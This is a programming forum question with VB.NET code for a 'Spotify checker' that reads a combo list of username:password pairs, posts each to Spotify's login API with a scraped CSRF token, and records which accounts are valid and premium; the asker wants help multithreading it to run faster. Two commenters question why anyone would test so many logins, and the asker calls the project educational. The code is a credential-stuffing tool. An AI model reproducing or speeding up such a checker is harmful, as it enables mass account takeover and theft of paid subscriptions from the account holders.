# Multithreading and splitting the workload

Tags: vb.net, multithreading

So I created a spotify checker to check a list of accounts on their logins and current subscription, This works fine, but it's only running on one thread and that in my opinion is really slow. So I started searching around for multithreading (I am pretty new to vb.net and am trying to learn this way.) But everything I threw at it would just run all threads seperately on the same accounts without any difference in results, just that they were printed out multiple times.

The code for the sub Login:

```
    Public Sub Login()
    Dim index As Integer = 0
    While index < Combos.Count
        Dim str() As String = Combos(index).Split(":")
        Using req As New HttpRequest
            req.UserAgent = Http.ChromeUserAgent
            req.Cookies = New CookieDictionary()
            req.Proxy = Nothing
            req.IgnoreProtocolErrors = True

            req.Get("https://accounts.spotify.com/en-US/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F")

            Dim token As String = req.Cookies.ToString

            Dim csrf As String = Regex.Match(token, "csrf_token=(\S+)").Groups(1).ToString

            req.Referer = "https://accounts.spotify.com/en-US/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F"
            req.AddHeader("Cookie", "csrf_token=" + csrf + "; __bon=MHwwfDQ1MzY4Nzk4M3wxOTA1NDg5NTI4NnwxfDF8MXwx; fb_continue=https%3A%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F; remember=false")
            req.AddParam("remember", "false")
            req.AddParam("username", str(0))
            req.AddParam("password", str(1))
            req.AddParam("captcha_token", "")
            req.AddParam("csrf_token", csrf)
            Dim respo As String = req.Post("https://accounts.spotify.com/api/login").ToString
            If respo.Contains("displayName") Then
                Dim IT As New ListViewItem
                IT.Text = str(0)
                IT.SubItems.Add(str(1))
                Dim html As String = req.Post("https://spotify.com/account/subscription/").ToString
                Dim Info As Match = Regex.Match(html, "<h3.*>(.*)<\/h3>")
                Dim Type As String = Info.Groups(1).Value
                If Type.Contains("Spotify Premium") Then
                    IT.SubItems.Add("Spotify Premium")
                    ListView1.Items.Add(IT)
                    Label3.Text += 1
                    Label1.Text += 1
                ElseIf Type.Contains("Premium for Family") Then
                    IT.SubItems.Add("Spotify Premium for Family")
                    ListView1.Items.Add(IT)
                    Label3.Text += 1
                    Label1.Text += 1
                Else
                    If StrafeCheckBox1.Checked = False Then
                        Label2.Text += 1
                    Else
                        IT.SubItems.Add("Free")
                        ListView1.Items.Add(IT)
                        Label1.Text += 1
                    End If
                End If
            Else
                Label2.Text += 1
            End If
        End Using
        index += 1
        StrafeProgressBar1.Value = index
        If index = Combos.Count Then
            MsgBox("Done, successfull logins: " + Label1.Text)
        End If
    End While
End Sub
```

Code for the start button:

```
    Private Sub LoginBTN_Click(sender As Object, e As EventArgs) Handles StartBTN.Click
    Dim IH As New Thread(AddressOf Login) : IH.Start()
    StrafeProgressBar1.Maximum = Combos.Count
End Sub
```

So what I basically want to know, is how I get the threads to split the 
workload evenly. and finish the job a lot quicker.

All help is appreciated.

Comment: I hope you are not posting private URLs and logins to Spotify

Comment: I'm slightly concerened about what you're trying to achieve here. The simple answer is you are passing all of the logins within the Login method, the workers are each processing this, therefore each of them are doing all of the logins. 
More worrying though, is why and how are you passing so many login details to Spotify? This seems very curious to me. To ask this question would imply you have a large amount of login details... Please correct me if I am completely wrong!

Comment: To wave away all your concerns, no I do not have any large lists of spotify accounts, I created a few free accounts and used my own premium. This is purely educational for me as a starter to vb.net, I was curious as of how I should interract with webpages and complete a login, etc. Recently I had read about multithreading and I wondered how I could implement it into this project, if this by any means worries you, I'll stop this project and try to learn multithreading another way.